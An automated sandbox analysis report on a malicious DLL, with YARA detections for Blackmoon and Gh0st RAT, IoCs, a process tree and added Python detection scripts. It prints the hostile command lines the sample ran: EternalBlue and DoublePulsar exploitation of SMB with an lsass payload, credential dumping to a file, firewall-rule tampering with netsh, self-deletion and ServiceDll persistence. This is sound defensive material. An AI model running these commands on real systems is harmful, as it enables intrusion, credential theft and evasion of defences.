Analysis
max time kernel: 146s
max time network: 153s
platform: windows7_x64
resource: win7-20241010-en
resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
submitted: 27/12/2024, 04:56
Behavioral task behavioral1
Sample: 947897f1318cd1e03417c2e4699ac14c2d8b2e4fd7e51a5044fc2d5f8257e738.dll
Resource: win7-20241010-en
Behavioral task behavioral2
Sample: 947897f1318cd1e03417c2e4699ac14c2d8b2e4fd7e51a5044fc2d5f8257e738.dll
Resource: win10v2004-20241007-en
General
Target: 947897f1318cd1e03417c2e4699ac14c2d8b2e4fd7e51a5044fc2d5f8257e738.dll
Size: 153KB
MD5: 0dbc181e2d3c29cff307d69d70df4a80
SHA1: 7a7ee57261356957fc9cd66d70771ba0b8609f83
SHA256: 947897f1318cd1e03417c2e4699ac14c2d8b2e4fd7e51a5044fc2d5f8257e738
SHA512: cec7c14cb6000620bc31fed4bbc464bd553d091838ddba3b74972ed4f55630aa7d965c822db059bca52c62357e542db521659847892de6c238a4160812ef48e7
SSDEEP: 3072:C5VK0lTSG9xoC+CQpiU5M8U3mjfv2JxhGtBx0N4w:d0T9xB+CUamjfvIxhGtB6N
Malware Config
Signatures
Blackmoon family
Detect Blackmoon payload 13 IoCs
resource  yara_rule
behavioral1/memory/2784-52-0x0000000000400000-0x0000000000D25000-memory.dmp  family_blackmoon
behavioral1/memory/2784-10160-0x0000000000400000-0x0000000000D25000-memory.dmp  family_blackmoon
behavioral1/memory/2784-13597-0x0000000000400000-0x0000000000D25000-memory.dmp  family_blackmoon
behavioral1/files/0x00080000000195c6-13598.dat  family_blackmoon
behavioral1/memory/2784-13610-0x0000000000400000-0x0000000000D25000-memory.dmp  family_blackmoon
behavioral1/memory/2784-13613-0x0000000000400000-0x0000000000D25000-memory.dmp  family_blackmoon
behavioral1/memory/2784-13614-0x0000000000400000-0x0000000000D25000-memory.dmp  family_blackmoon
behavioral1/files/0x000500000001a7f7-13633.dat  family_blackmoon
behavioral1/memory/2936-13635-0x0000000000400000-0x0000000001BF5000-memory.dmp  family_blackmoon
behavioral1/memory/2784-13649-0x0000000000400000-0x0000000000D25000-memory.dmp  family_blackmoon
behavioral1/memory/2784-13808-0x0000000000400000-0x0000000000D25000-memory.dmp  family_blackmoon
behavioral1/memory/2784-13815-0x0000000000400000-0x0000000000D25000-memory.dmp  family_blackmoon
behavioral1/memory/2784-13818-0x0000000000400000-0x0000000000D25000-memory.dmp  family_blackmoon
Gh0st RAT payload 14 IoCs
resource  yara_rule
behavioral1/memory/2808-8-0x0000000000400000-0x0000000000409000-memory.dmp  family_gh0strat
behavioral1/memory/2808-7-0x0000000000400000-0x0000000000409000-memory.dmp  family_gh0strat
behavioral1/memory/2808-9-0x0000000000400000-0x0000000000409000-memory.dmp  family_gh0strat
behavioral1/memory/2808-5-0x0000000000400000-0x0000000000409000-memory.dmp  family_gh0strat
behavioral1/memory/2808-3-0x0000000000400000-0x0000000000409000-memory.dmp  family_gh0strat
behavioral1/memory/2808-2-0x0000000000400000-0x0000000000409000-memory.dmp  family_gh0strat
behavioral1/memory/2808-10-0x0000000000400000-0x0000000000409000-memory.dmp  family_gh0strat
behavioral1/memory/2808-13627-0x0000000000400000-0x0000000000409000-memory.dmp  family_gh0strat
behavioral1/files/0x000500000001a7f7-13633.dat  family_gh0strat
behavioral1/memory/2936-13635-0x0000000000400000-0x0000000001BF5000-memory.dmp  family_gh0strat
behavioral1/memory/6204-13643-0x0000000000400000-0x000000000042A000-memory.dmp  family_gh0strat
behavioral1/memory/6204-13641-0x0000000000400000-0x000000000042A000-memory.dmp  family_gh0strat
behavioral1/memory/6204-13639-0x0000000000400000-0x000000000042A000-memory.dmp  family_gh0strat
behavioral1/memory/6204-13646-0x0000000000400000-0x000000000042A000-memory.dmp  family_gh0strat
Gh0strat family
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 12 IoCs
pid  Process
10012 netsh.exe
9724 netsh.exe
9520 netsh.exe
9364 netsh.exe
5544 netsh.exe
5812 netsh.exe
8932 netsh.exe
8796 netsh.exe
6328 netsh.exe
9132 netsh.exe
8536 netsh.exe
8360 netsh.exe
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
description  ioc  Process
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\GraphicsPerfSvcs\Parameters\ServiceDll = "C:\\Users\\Admin\\AppData\\Roaming\\GraphicsPerfSvcs.dll"  Hooks.exe
Executes dropped EXE 10 IoCs
pid  Process
2784 MpMgSvc.exe
6324 Eternalblue-2.2.0.exe
9812 Eternalblue-2.2.0.exe
564 Wmicc.exe
5552 GetPassword.exe
2936 Hooks.exe
8388 Doublepulsar-1.3.1.exe
1612 Doublepulsar-1.3.1.exe
2532 ctfmoon.exe
2292 Meson.exe
Loads dropped DLL 64 IoCs
pid  Process  (consecutive load events, in report order)
2808 svchost.exe (2)
2784 MpMgSvc.exe (2)
6324 Eternalblue-2.2.0.exe (9)
2784 MpMgSvc.exe (1)
9812 Eternalblue-2.2.0.exe (9)
2784 MpMgSvc.exe (2)
700 cmd.exe (1)
2808 svchost.exe (2)
948 svchost.exe (1)
2784 MpMgSvc.exe (1)
8388 Doublepulsar-1.3.1.exe (15)
1612 Doublepulsar-1.3.1.exe (15)
948 svchost.exe (4)
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description  ioc
Destination IP 110.11.158.238
Destination IP 1.226.84.135
Destination IP 124.160.26.219
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow  ioc
13200 api6.my-ip.io
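The two network signatures above ("Creates a large amount of network flows" and "Unexpected DNS network traffic destination") can both be reproduced from plain flow records. The following Python is an added example and not part of the sandbox report or its tooling: it takes constructed flow records (only the three port-53 destination IPs are taken from the report; the source host, the resolver address 10.127.0.1, the TCP/445 sweep of 40 hosts and the threshold of 20 are assumptions) and applies the two heuristics: port-53 traffic to a destination that is not a configured resolver, and one source opening flows to many distinct hosts on the same port.

```python
"""Triage of sandbox network-flow records (added example, not from the report)."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dport: int
    proto: str  # "tcp" or "udp"


# Assumed: the resolver the sandbox VM hands the guest via DHCP.
CONFIGURED_DNS = frozenset({"10.127.0.1"})

# Constructed flows. 110.11.158.238, 1.226.84.135 and 124.160.26.219 are the
# port-53 destinations the report lists; every other address is made up.
SAMPLE_FLOWS = (
    [
        Flow("10.127.0.15", "10.127.0.1", 53, "udp"),      # legitimate resolver
        Flow("10.127.0.15", "110.11.158.238", 53, "tcp"),  # not a resolver
        Flow("10.127.0.15", "1.226.84.135", 53, "tcp"),
        Flow("10.127.0.15", "124.160.26.219", 53, "tcp"),
        Flow("10.127.0.15", "10.127.0.1", 53, "udp"),
        Flow("10.127.0.15", "203.0.113.7", 443, "tcp"),    # ordinary HTTPS
    ]
    # Constructed sweep: 40 distinct hosts on one port from one source.
    + [Flow("10.127.0.15", f"192.168.1.{i}", 445, "tcp") for i in range(1, 41)]
)


def rogue_dns(flows, configured_dns=CONFIGURED_DNS):
    """Distinct port-53 destinations that are not configured resolvers.

    Port 53 to anything but the configured resolver is either a hard-coded
    resolver in the sample or C2 traffic hiding on the DNS port; either way it
    deserves a look, which is what the report's signature encodes.
    """
    return sorted(
        {f.dst for f in flows if f.dport == 53 and f.dst not in configured_dns}
    )


def scan_suspects(flows, threshold=20):
    """{(src, dport): distinct destination count} for pairs at or over threshold.

    A service sweep looks like one source hitting many hosts on one port, so
    the count is keyed on (source, destination port), not on total flow volume:
    a busy download of one file never trips it, a sweep of a /24 does.
    """
    targets = defaultdict(set)
    for f in flows:
        targets[(f.src, f.dport)].add(f.dst)
    return {k: len(v) for k, v in targets.items() if len(v) >= threshold}


if __name__ == "__main__":
    print("port-53 traffic to non-resolvers:", rogue_dns(SAMPLE_FLOWS))
    print("scan suspects:", scan_suspects(SAMPLE_FLOWS))
```

Feeding a real capture in is a matter of building `Flow` objects from whatever exporter you have (the fields are the usual 5-tuple minus the source port); the configured resolver set should come from the guest's DHCP lease or network adapter settings rather than being hard-coded as it is here.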
Drops file in System32 directory 3 IoCs
description  ioc  Process
File created C:\Windows\system32\config\systemprofile\AppData\Roaming\traffmonetizer\settings.json  svchost.exe
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat  svchost.exe
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\64[1].jpg  svchost.exe
Suspicious use of SetThreadContext 2 IoCs
description  pid  Process  procid_target
PID 1680 set thread context of 2808  1680 rundll32.exe  30
PID 948 set thread context of 6204  948 svchost.exe  46
yara rule upx 15 IoCs
resource  yara_rule
behavioral1/files/0x002a0000000195bd-15.dat  upx
behavioral1/memory/2784-25-0x0000000000400000-0x0000000000D25000-memory.dmp  upx
behavioral1/memory/2784-52-0x0000000000400000-0x0000000000D25000-memory.dmp  upx
behavioral1/memory/2784-10160-0x0000000000400000-0x0000000000D25000-memory.dmp  upx
behavioral1/memory/2784-13597-0x0000000000400000-0x0000000000D25000-memory.dmp  upx
behavioral1/memory/2784-13610-0x0000000000400000-0x0000000000D25000-memory.dmp  upx
behavioral1/memory/2784-13613-0x0000000000400000-0x0000000000D25000-memory.dmp  upx
behavioral1/memory/2784-13614-0x0000000000400000-0x0000000000D25000-memory.dmp  upx
behavioral1/files/0x000500000001a4ba-13620.dat  upx
behavioral1/memory/2936-13631-0x0000000000400000-0x0000000001BF5000-memory.dmp  upx
behavioral1/memory/2936-13635-0x0000000000400000-0x0000000001BF5000-memory.dmp  upx
behavioral1/memory/2784-13649-0x0000000000400000-0x0000000000D25000-memory.dmp  upx
behavioral1/memory/2784-13808-0x0000000000400000-0x0000000000D25000-memory.dmp  upx
behavioral1/memory/2784-13815-0x0000000000400000-0x0000000000D25000-memory.dmp  upx
behavioral1/memory/2784-13818-0x0000000000400000-0x0000000000D25000-memory.dmp  upx
Drops file in Windows directory 64 IoCs
description  ioc  Process
File created, by svchost.exe, under C:\Windows\Microsoft.NET\traffmonetizer\ (60 files): System.Collections.Immutable.dll, System.Net.WebSockets.Client.dll, System.Resources.Writer.dll, System.Text.Json.dll, Microsoft.Diagnostics.NETCore.Client.dll, System.IO.FileSystem.Primitives.dll, System.IO.Pipes.dll, System.Reflection.Extensions.dll, System.Threading.Thread.dll, System.Collections.NonGeneric.dll, System.Globalization.dll, System.Security.Cryptography.Algorithms.dll, System.Text.RegularExpressions.dll, System.Text.Encodings.Web.dll, System.Diagnostics.TraceSource.dll, System.Diagnostics.Tracing.dll, System.Net.NameResolution.dll, System.Net.NetworkInformation.dll, System.Net.Primitives.dll, System.Runtime.Numerics.dll, System.Runtime.Serialization.Xml.dll, System.ValueTuple.dll, System.Collections.Specialized.dll, System.Threading.ThreadPool.dll, System.ComponentModel.dll, System.Console.dll, System.Globalization.Calendars.dll, System.AppContext.dll, System.Net.Requests.dll, System.Runtime.CompilerServices.Unsafe.dll, System.Text.Encoding.Extensions.dll, Microsoft.Win32.Primitives.dll, System.Net.Http.dll, System.Net.WebSockets.dll, System.Runtime.dll, System.Runtime.Extensions.dll, System.Text.Encoding.dll, System.Buffers.dll, System.Collections.Concurrent.dll, System.Diagnostics.FileVersionInfo.dll, System.Net.Security.dll, System.Security.Principal.dll, Microsoft.Bcl.AsyncInterfaces.dll, System.Diagnostics.TextWriterTraceListener.dll, System.Reflection.Metadata.dll, System.Resources.Reader.dll, System.Security.SecureString.dll, System.Xml.XmlSerializer.dll, System.ComponentModel.TypeConverter.dll, System.Linq.dll, System.Memory.dll, System.IO.dll, System.IO.FileSystem.dll, System.IO.FileSystem.DriveInfo.dll, System.Resources.ResourceManager.dll, System.Runtime.CompilerServices.VisualC.dll, System.Globalization.Extensions.dll, System.Numerics.Vectors.dll, System.Reflection.dll, System.Runtime.InteropServices.dll
File created C:\Windows\Microsoft.NET\ctfmoon.exe  svchost.exe
File created C:\Windows\Microsoft.NET\Meson.exe  svchost.exe
File created C:\Windows\Microsoft.NET\root_conf\default.toml  svchost.exe
File opened for modification C:\Windows\Microsoft.NET\traffmonetizer\System.Diagnostics.FileVersionInfo.dll  svchost.exe
Event Triggered Execution: Netsh Helper DLL 1 TTPs 36 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. On start it loads every helper DLL registered under HKLM\SOFTWARE\Microsoft\NetSh (HKLM\SOFTWARE\Wow6432Node\Microsoft\NetSh for the 32-bit netsh), so a DLL registered there runs each time netsh is invoked. All 36 events below are reads of that key by netsh.exe, which is what helper enumeration at startup looks like; this report records no write to the key.
description  ioc  Process  (events)
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh  netsh.exe (12)
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh  netsh.exe (12)
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh  netsh.exe (12)
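Both the "Terminal Services DLL" signature earlier (Hooks.exe writing a ServiceDll value under GraphicsPerfSvcs that points into AppData\Roaming) and the Netsh helper DLL signature above describe the same trick: a registry value that makes a trusted Windows process load an attacker-supplied DLL. The Python below is an added example, not code from the report or its tooling. It parses registry records in the report's own `Set value (str) <key> = "<value>" <process>` shape and flags ServiceDll and NetSh helper values whose DLL lives outside the Windows directory. Only the GraphicsPerfSvcs record is quoted from the report; the Dhcp and NetSh records are constructed, and since the report shows netsh.exe reading the NetSh key but never shows a value being written, the NetSh lines assume a `...\NetSh\<helper name> = "<dll>"` layout.

```python
"""Flag ServiceDll and netsh-helper registrations that point outside Windows.

Added example, not part of the sandbox report. Registry records are consumed in
the report's textual shape; SAMPLE_RECORDS mixes one line quoted from the report
with constructed ones.
"""
import re
from pathlib import PureWindowsPath

RECORD_RE = re.compile(
    r'^Set value \(str\) (?P<key>\\REGISTRY\\.+?) = "(?P<value>.*)" (?P<process>\S+)$'
)
# Prefixes treated as "the Windows directory"; everything else is "outside".
WINDOWS_DIR_PREFIXES = ("c:\\windows\\", "%systemroot%\\", "%windir%\\")

SAMPLE_RECORDS = [
    # Quoted from the report: Hooks.exe registers a DLL in AppData as a service DLL.
    r'Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\GraphicsPerfSvcs\Parameters\ServiceDll = "C:\\Users\\Admin\\AppData\\Roaming\\GraphicsPerfSvcs.dll" Hooks.exe',
    # Constructed: a normal svchost-hosted service.
    r'Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Dhcp\Parameters\ServiceDll = "%SystemRoot%\\system32\\dhcpcore.dll" services.exe',
    # Constructed: a stock netsh helper registered by bare file name.
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh\ifmon = "ifmon.dll" netsh.exe',
    # Constructed: a helper registered with an absolute path outside Windows.
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh\helper = "C:\\ProgramData\\helper.dll" netsh.exe',
    # Quoted shape of the report's read events; not a value write, so ignored.
    r'Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe',
]


def parse_record(line):
    """Return (key, value, process) or None for lines of another shape."""
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    # The report doubles backslashes inside quoted values; undo that.
    return m["key"], m["value"].replace("\\\\", "\\"), m["process"]


def classify_dll_path(value):
    """'windows', 'outside', or 'relative' (bare name resolved via DLL search order)."""
    p = value.strip().lower()
    if not p.startswith("%") and not PureWindowsPath(p).is_absolute():
        return "relative"
    return "windows" if p.startswith(WINDOWS_DIR_PREFIXES) else "outside"


def find_dll_persistence(lines):
    """Findings for ServiceDll / NetSh helper values that load code from outside Windows."""
    findings = []
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        key, value, process = rec
        parts, lower = key.split("\\"), key.lower()
        if lower.endswith("\\parameters\\servicedll"):
            technique, name = "ServiceDll", parts[-3]   # ...\services\<name>\Parameters\ServiceDll
        elif "\\microsoft\\netsh\\" in lower:
            technique, name = "NetshHelper", parts[-1]  # ...\NetSh\<helper name>
        else:
            continue
        where = classify_dll_path(value)
        # Stock netsh helpers are registered by bare name and resolve from
        # System32, so a relative helper is only reportable after an on-host
        # existence check; a relative ServiceDll is abnormal and is reported.
        if where == "outside" or (technique == "ServiceDll" and where == "relative"):
            findings.append({"technique": technique, "name": name,
                             "dll": value, "process": process, "path": where})
    return findings


if __name__ == "__main__":
    for f in find_dll_persistence(SAMPLE_RECORDS):
        print(f"{f['technique']}: {f['name']} -> {f['dll']} (set by {f['process']})")
```

On a live host the same two checks are a walk over `HKLM\SYSTEM\CurrentControlSet\Services\*\Parameters\ServiceDll` and the values under both NetSh keys; the path classification is deliberately crude (a DLL under C:\Windows\Temp would pass it), so pair it with signature checks on the files it accepts.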
System Location Discovery: System Language Discovery 1 TTPs 26 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description  ioc  Process  (events)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  netsh.exe (12)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  svchost.exe (3)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe (1)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  ctfmoon.exe (1)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  Meson.exe (1)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  MpMgSvc.exe (1)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  Doublepulsar-1.3.1.exe (2)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe (1)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  Hooks.exe (1)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  Eternalblue-2.2.0.exe (2)
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  Wmicc.exe (1)
Modifies data under HKEY_USERS 64 IoCs
description  ioc  Process
Meson.exe, Set value (str) under \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\ (45 time-zone display strings): @tzres.dll,-364 = "Middle East Daylight Time"; -1041 = "Ulaanbaatar Daylight Time"; -581 = "North Asia East Daylight Time"; -241 = "Samoa Daylight Time"; -602 = "Taipei Standard Time"; -1042 = "Ulaanbaatar Standard Time"; -462 = "Afghanistan Standard Time"; -222 = "Alaskan Standard Time"; -891 = "Morocco Daylight Time"; -591 = "Malay Peninsula Daylight Time"; -671 = "AUS Eastern Daylight Time"; -121 = "SA Pacific Daylight Time"; -492 = "India Standard Time"; -242 = "Samoa Standard Time"; -221 = "Alaskan Daylight Time"; -449 = "Azerbaijan Standard Time"; -104 = "Central Brazilian Daylight Time"; -432 = "Iran Standard Time"; -352 = "FLE Standard Time"; -422 = "Russian Standard Time"; -331 = "E. Europe Daylight Time"; -215 = "Pacific Standard Time (Mexico)"; -301 = "Romance Daylight Time"; -692 = "Tasmania Standard Time"; -272 = "Greenwich Standard Time"; -211 = "Pacific Daylight Time"; -741 = "New Zealand Daylight Time"; -561 = "SE Asia Daylight Time"; -672 = "AUS Eastern Standard Time"; -385 = "Namibia Standard Time"; -791 = "SA Western Daylight Time"; -42 = "E. South America Standard Time"; -961 = "Paraguay Daylight Time"; -172 = "Central Standard Time (Mexico)"; -252 = "Dateline Standard Time"; -232 = "Hawaiian Standard Time"; -1412 = "Syria Standard Time"; -1472 = "Magadan Standard Time"; -872 = "Pakistan Standard Time"; -1022 = "Bangladesh Standard Time"; -571 = "China Daylight Time"; -131 = "US Eastern Daylight Time"; -431 = "Iran Daylight Time"; -152 = "Central America Standard Time"; -412 = "E. Africa Standard Time"
netsh.exe, Set value under \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\ (10 events): (str) @%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"; (data) LanguageList = 65006e002d0055005300000065006e0000000000 (4 events); (str) @%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0"; (str) @%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"; (str) @%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP"; (str) @%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"; (str) @%SystemRoot%\system32\eapqec.dll,-102 = "1.0"
svchost.exe, under \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings (9 events): Set value (int) ProxyEnable = "0"; Key created Wpad; Set value (str) 5.0\Cache\Content\CachePrefix; Key created Internet Settings; Set value (data) Wpad\{646ADAD8-DAC8-41BE-8335-8C0366E934AA}\WpadDecisionTime = 309f55071c58db01; Key created Connections; Set value (str) 5.0\Cache\Cookies\CachePrefix = "Cookie:"; Key created Wpad\{646ADAD8-DAC8-41BE-8335-8C0366E934AA}; Set value (str) Wpad\{646ADAD8-DAC8-41BE-8335-8C0366E934AA}\WpadNetworkName = "Network 3"
Suspicious behavior: EnumeratesProcesses 24 IoCs
pid  Process  (events)
2784 MpMgSvc.exe (9)
5552 GetPassword.exe (3)
5332 powershell.exe (1)
948 svchost.exe (11)
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid  Process
6204 svchost.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs
description  pid  Process
Token: SeDebugPrivilege  5552 GetPassword.exe
Token: SeDebugPrivilege  5332 powershell.exe
Suspicious use of SetWindowsHookEx 4 IoCs
pid  Process  (events)
2784 MpMgSvc.exe (2)
564 Wmicc.exe (1)
2936 Hooks.exe (1)
Suspicious use of WriteProcessMemory 64 IoCs
description  pid  Process  procid_target  (events)
PID 1680 wrote to memory of 2808  1680 rundll32.exe  30  (9)
PID 2808 wrote to memory of 2784  2808 svchost.exe  32  (4)
PID 2784 wrote to memory of 6324  2784 MpMgSvc.exe  33  (4)
PID 2784 wrote to memory of 9812  2784 MpMgSvc.exe  35  (4)
PID 2784 wrote to memory of 564  2784 MpMgSvc.exe  38  (4)
PID 564 wrote to memory of 700  564 Wmicc.exe  39  (4)
PID 700 wrote to memory of 5552  700 cmd.exe  41  (4)
PID 2808 wrote to memory of 2936  2808 svchost.exe  42  (4)
PID 2936 wrote to memory of 5332  2936 Hooks.exe  44  (4)
PID 948 wrote to memory of 6204  948 svchost.exe  46  (9)
PID 948 wrote to memory of 6328  948 svchost.exe  47  (4)
PID 948 wrote to memory of 10012  948 svchost.exe  49  (4)
PID 948 wrote to memory of 9724  948 svchost.exe  51  (4)
PID 948 wrote to memory of 9520  948 svchost.exe  53  (2, list cut off at 64 IoCs)
Processes (child processes are indented under their parent; each process line is followed by its command line, the signatures it triggered, and its PID)
C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\947897f1318cd1e03417c2e4699ac14c2d8b2e4fd7e51a5044fc2d5f8257e738.dll,#1
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID: 1680
    C:\Windows\SysWOW64\svchost.exe
      "C:\Windows\SysWOW64\svchost.exe"
      - Loads dropped DLL
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID: 2808
        C:\WINDOWS\Temp\MpMgSvc.exe
          "C:\WINDOWS\Temp\MpMgSvc.exe"
          - Executes dropped EXE
          - Loads dropped DLL
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory
          PID: 2784
            C:\WINDOWS\Temp\Eternalblue-2.2.0.exe
              Eternalblue-2.2.0.exe --TargetIp 10.127.0.123 --Target WIN72K8R2 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig LOG.txt
              - Executes dropped EXE
              - Loads dropped DLL
              - System Location Discovery: System Language Discovery
              PID: 6324
            C:\WINDOWS\Temp\Eternalblue-2.2.0.exe
              Eternalblue-2.2.0.exe --TargetIp 10.127.0.123 --Target WIN72K8R2 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig LOG.txt
              - Executes dropped EXE
              - Loads dropped DLL
              - System Location Discovery: System Language Discovery
              PID: 9812
            C:\Windows\Temp\Wmicc.exe
              "C:\Windows\Temp\Wmicc.exe"
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              - Suspicious use of SetWindowsHookEx
              - Suspicious use of WriteProcessMemory
              PID: 564
                C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /c C:\Windows\Temp\GetPassword.exe >C:\Windows\Temp\PWD.txt
                  - Loads dropped DLL
                  - System Location Discovery: System Language Discovery
                  - Suspicious use of WriteProcessMemory
                  PID: 700
                    C:\Windows\Temp\GetPassword.exe
                      C:\Windows\Temp\GetPassword.exe
                      - Executes dropped EXE
                      - Suspicious behavior: EnumeratesProcesses
                      - Suspicious use of AdjustPrivilegeToken
                      PID: 5552
            C:\WINDOWS\Temp\Doublepulsar-1.3.1.exe
              Doublepulsar-1.3.1.exe --OutConfig LOG.txt --TargetIp 10.127.0.123 --TargetPort 445 --DllPayload x64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll
              - Executes dropped EXE
              - Loads dropped DLL
              - System Location Discovery: System Language Discovery
              PID: 8388
            C:\WINDOWS\Temp\Doublepulsar-1.3.1.exe
              Doublepulsar-1.3.1.exe --OutConfig LOG.txt --TargetIp 10.127.0.123 --TargetPort 445 --DllPayload x64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll
              - Executes dropped EXE
              - Loads dropped DLL
              - System Location Discovery: System Language Discovery
              PID: 1612
        C:\WINDOWS\Temp\Hooks.exe
          "C:\WINDOWS\Temp\Hooks.exe"
          - Server Software Component: Terminal Services DLL
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory
          PID: 2936
            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Sleep -s 2;del "C:\WINDOWS\Temp\Hooks.exe"
              - System Location Discovery: System Language Discovery
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              PID: 5332
C:\Windows\SysWOW64\svchost.exe
  C:\Windows\SysWOW64\svchost.exe -k GraphicsPerfSvcsGroup
  - Loads dropped DLL
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID: 948
    C:\Windows\SysWOW64\svchost.exe
      "C:\Windows\system32\svchost.exe"
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: GetForegroundWindowSpam
      PID: 6204
    C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name=Microsoft_ctfmoon dir=in program=C:\Windows\Microsoft.NET\ctfmoon.exe action=allow
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      PID: 6328
    C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name=Microsoft_ctfmoon dir=out program=C:\Windows\Microsoft.NET\ctfmoon.exe action=allow
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      PID: 10012
    C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall set rule name=Microsoft_ctfmoon new enable=yes
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
      - System Location Discovery: System Language Discovery
      PID: 9724
    C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name=Microsoft_Edge dir=in program=C:\Windows\Microsoft.NET\Meson.exe action=allow
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
      - System Location Discovery: System Language Discovery
      PID: 9520
    C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name=Microsoft_Edge dir=out program=C:\Windows\Microsoft.NET\Meson.exe action=allow
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
      - System Location Discovery: System Language Discovery
      PID: 9364
    C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall set rule name=Microsoft_Edge new enable=yes
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
      - System Location Discovery: System Language Discovery
      PID: 5544
    C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name=Microsoft_Dcom dir=in program=C:\Windows\Microsoft.NET\traffmonetizer\traffmonetizer.exe action=allow
      - Modifies Windows Firewall
      - Event Triggered Execution: Netsh Helper DLL
      - System Location Discovery: System Language Discovery
      PID: 5812
    C:\Windows\SysWOW64\netsh.exe
